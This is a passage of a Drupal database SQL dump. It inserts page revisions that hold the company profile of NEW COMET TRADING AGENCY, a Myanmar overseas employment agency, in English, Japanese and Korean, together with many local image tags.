data-entity-uuid=\"c2b2e5f4-fb99-4766-b2fd-9b2d6e680823\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-8_1.jpg\" data-align=\"center\" data-entity-uuid=\"0dfa63f3-2933-4e8b-842c-fb4562d7176d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9_1.jpg\" data-align=\"center\" data-entity-uuid=\"16e03ce5-055f-4f8f-8be5-1f11619e8445\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-10_1.jpg\" data-align=\"center\" data-entity-uuid=\"2a148620-3a3b-4fb9-8117-f6376f457d08\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_1.jpg\" data-align=\"center\" data-entity-uuid=\"87fee7fa-f754-4ed1-8b4c-e407735f3467\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-12_1.jpg\" data-align=\"center\" data-entity-uuid=\"9a88bbba-3b28-41fd-a8a8-84cca1770e30\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\" data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\" data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-15_1.jpg\" data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16_1.jpg\" data-align=\"center\" data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-17_1.jpg\" data-align=\"center\" data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_1.jpg\" data-align=\"center\" data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-19_1.jpg\" data-align=\"center\" data-entity-uuid=\"4b653764-4d92-4445-8e27-7614f6ef64a5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20_1.jpg\" data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\" data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_1.jpg\" data-align=\"center\" data-entity-uuid=\"48756932-2a18-4eed-9166-8ae3d494765e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\" data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_1.jpg\" data-align=\"center\" data-entity-uuid=\"a06d2513-b3b1-4975-8202-104c9b9ddf54\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\" data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\" data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\" data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\" data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\" data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_1.jpg\" data-align=\"center\" data-entity-uuid=\"1d69982c-23e7-4c63-b748-667e38a06b7f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_1.jpg\" data-align=\"center\" data-entity-uuid=\"f37e9936-ed46-428b-abbb-f585384d411f\" data-entity-type=\"file\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 293, 'en', 0, '<p>We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</p><p>NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</p><p>We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</p><p>In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</p><p>Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.</p><p>In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</p><p>We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.</p><p>In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</p><p>We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img data-entity-uuid=\"b8d07038-b5d4-49f5-ac18-2a68edcf66f2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-1.jpg\" data-align=\"center\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3.jpg\" data-align=\"center\" data-entity-uuid=\"e0e57835-6cc3-483a-895d-4d5108e80c57\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4.jpg\" data-entity-uuid=\"9b3a507c-edd4-4ce3-b1a2-4936996fbe84\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5.jpg\" data-align=\"center\" data-entity-uuid=\"9eac5e99-94a6-4dab-a71a-c4c7a78b8a7b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6.jpg\" data-align=\"center\" data-entity-uuid=\"99025867-1165-45b9-987a-162bd77afc85\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7.jpg\" data-align=\"center\" data-entity-uuid=\"ab865942-61f8-4761-ac2c-b83b675886cf\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8.jpg\" data-align=\"center\" data-entity-uuid=\"6eb2dc0f-9c32-4d4f-bb0a-7648ab39ab11\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9.jpg\" data-align=\"center\" data-entity-uuid=\"810afaf6-ff82-44e0-b231-927e848a41cc\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-10.jpg\" data-align=\"center\" data-entity-uuid=\"3258c9ec-64da-4a37-9e22-cff0a7b23efc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11.jpg\" data-align=\"center\" data-entity-uuid=\"0f435fe2-d603-4e29-b1d6-f0cc0a29d626\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12.jpg\" data-align=\"center\" data-entity-uuid=\"a095c373-2df3-4bba-be96-e259086824d6\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19.jpg\" data-align=\"center\" data-entity-uuid=\"28845640-721c-4663-99e4-3fe89a3fc124\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22.jpg\" data-align=\"center\" data-entity-uuid=\"010a0743-1136-4045-92de-ffa7bb03b84f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24.jpg\" data-align=\"center\" data-entity-uuid=\"f940eee5-3ae3-4b94-9585-f317c7d9bcb8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img data-entity-uuid=\"e50b34c5-96f9-44a3-bc19-61e501f16184\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-40_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-41.jpg\" data-align=\"center\" data-entity-uuid=\"d65558d3-211e-4a10-8124-f4f01a42f4b5\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 293, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img src=\"/sites/default/files/inline-images/1-NC_0.jpg\" data-align=\"center\" data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" alt=\"\"><img data-entity-uuid=\"20d75075-fb13-4332-9836-0cdbf49b8dfd\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-1_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-2_0.jpg\" data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_0.jpg\" data-align=\"center\" data-entity-uuid=\"80dbdd8c-e8cd-465b-b26c-e04b67966c31\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4_0.jpg\" data-align=\"center\" data-entity-uuid=\"d71b12e7-3d70-4a59-9715-2de3919ebc7d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_0.jpg\" data-align=\"center\" data-entity-uuid=\"8a845720-846c-47c3-b9e9-e1f3098f65fc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_0.jpg\" data-align=\"center\" data-entity-uuid=\"b24eb73f-1d94-4450-81a5-afb6790a13f7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-7_0.jpg\" data-align=\"center\" data-entity-uuid=\"51eb9cfb-ea78-4874-a2fb-af8d0ff97c38\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8_0.jpg\" data-align=\"center\" data-entity-uuid=\"873929b2-4641-4686-834e-aa5ef5948b3a\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-9_0.jpg\" data-align=\"center\" data-entity-uuid=\"aa07abd4-d198-4e2c-af81-6f1eae19da17\" data-entity-type=\"file\" alt=\"\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-10_0.jpg\" data-entity-uuid=\"41991b55-c606-4270-9a2f-eb3871ba0f31\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_0.jpg\" data-align=\"center\" data-entity-uuid=\"7f57bb37-0f0d-4aea-be9b-4a52fc0adf6f\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12_0.jpg\" data-align=\"center\" data-entity-uuid=\"88251347-e029-437d-9ff8-51f406d4402c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_0.jpg\" data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-14_0.jpg\" data-align=\"center\" data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15_0.jpg\" data-align=\"center\" data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-16_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_0.jpg\" data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19_0.jpg\" data-align=\"center\" data-entity-uuid=\"1a08f51b-fce7-42d3-ae81-1ad523dfd3e1\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-20_0.jpg\" data-align=\"center\" data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\" data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_0.jpg\" data-align=\"center\" data-entity-uuid=\"81098b50-a382-45b2-b96a-44bb91384739\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\" data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_0.jpg\" data-align=\"center\" data-entity-uuid=\"f8bf2dde-b25f-46bb-bc27-d95b894955e3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\" data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\" data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\" data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\" data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\"><img data-entity-uuid=\"4b011db5-14e8-4a56-a6da-e6fe90c2e0f3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-40_3.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-41_0.jpg\" data-align=\"center\" data-entity-uuid=\"5f5513ae-611d-4f95-aaba-1227dc176b2c\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 293, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.</p><p><br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.또한, 두바이, 말레이시아, 싱가포르, 태국, 일본 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 받알 수 있도록 &nbsp;서비스들을 제공하고 있습니다.</p><p><br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.</p><p><br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.</p><p><br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img src=\"/sites/default/files/inline-images/1-NC_1.jpg\" data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-1_2.jpg\" data-align=\"center\" data-entity-uuid=\"d19e5ddf-b119-4ed3-ac45-b0803d864c96\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\" data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_1.jpg\" data-align=\"center\" data-entity-uuid=\"f854e47f-d973-4dd9-8219-826768f1adc8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_1.jpg\" data-align=\"center\" data-entity-uuid=\"13857fa4-2c7a-4d5b-990d-45454d4ce664\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_1.jpg\" data-align=\"center\" data-entity-uuid=\"c4d3c7e6-c2a6-47c1-a423-afbb8fed637d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_1.jpg\" data-align=\"center\" data-entity-uuid=\"55284a88-e85b-4812-9ae7-807f898d55f7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7_1.jpg\" data-align=\"center\" data-entity-uuid=\"c2b2e5f4-fb99-4766-b2fd-9b2d6e680823\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-8_1.jpg\" data-align=\"center\" data-entity-uuid=\"0dfa63f3-2933-4e8b-842c-fb4562d7176d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9_1.jpg\" data-align=\"center\" data-entity-uuid=\"16e03ce5-055f-4f8f-8be5-1f11619e8445\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-10_1.jpg\" data-align=\"center\" data-entity-uuid=\"2a148620-3a3b-4fb9-8117-f6376f457d08\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_1.jpg\" data-align=\"center\" data-entity-uuid=\"87fee7fa-f754-4ed1-8b4c-e407735f3467\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-12_1.jpg\" data-align=\"center\" data-entity-uuid=\"9a88bbba-3b28-41fd-a8a8-84cca1770e30\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\" data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\" data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-15_1.jpg\" data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16_1.jpg\" data-align=\"center\" data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-17_1.jpg\" data-align=\"center\" data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_1.jpg\" data-align=\"center\" data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-19_1.jpg\" data-align=\"center\" data-entity-uuid=\"4b653764-4d92-4445-8e27-7614f6ef64a5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20_1.jpg\" data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\" data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_1.jpg\" data-align=\"center\" data-entity-uuid=\"48756932-2a18-4eed-9166-8ae3d494765e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\" data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_1.jpg\" data-align=\"center\" data-entity-uuid=\"a06d2513-b3b1-4975-8202-104c9b9ddf54\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\" data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\" data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\" data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\" data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\" data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_1.jpg\" data-align=\"center\" data-entity-uuid=\"1d69982c-23e7-4c63-b748-667e38a06b7f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_1.jpg\" data-align=\"center\" data-entity-uuid=\"f37e9936-ed46-428b-abbb-f585384d411f\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 294, 'en', 0, '<p>We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</p><p>NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</p><p>We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</p><p>In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</p><p>Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.</p><p>In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</p><p>We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.</p><p>In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</p><p>We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img data-entity-uuid=\"b8d07038-b5d4-49f5-ac18-2a68edcf66f2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-1.jpg\" data-align=\"center\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3.jpg\" 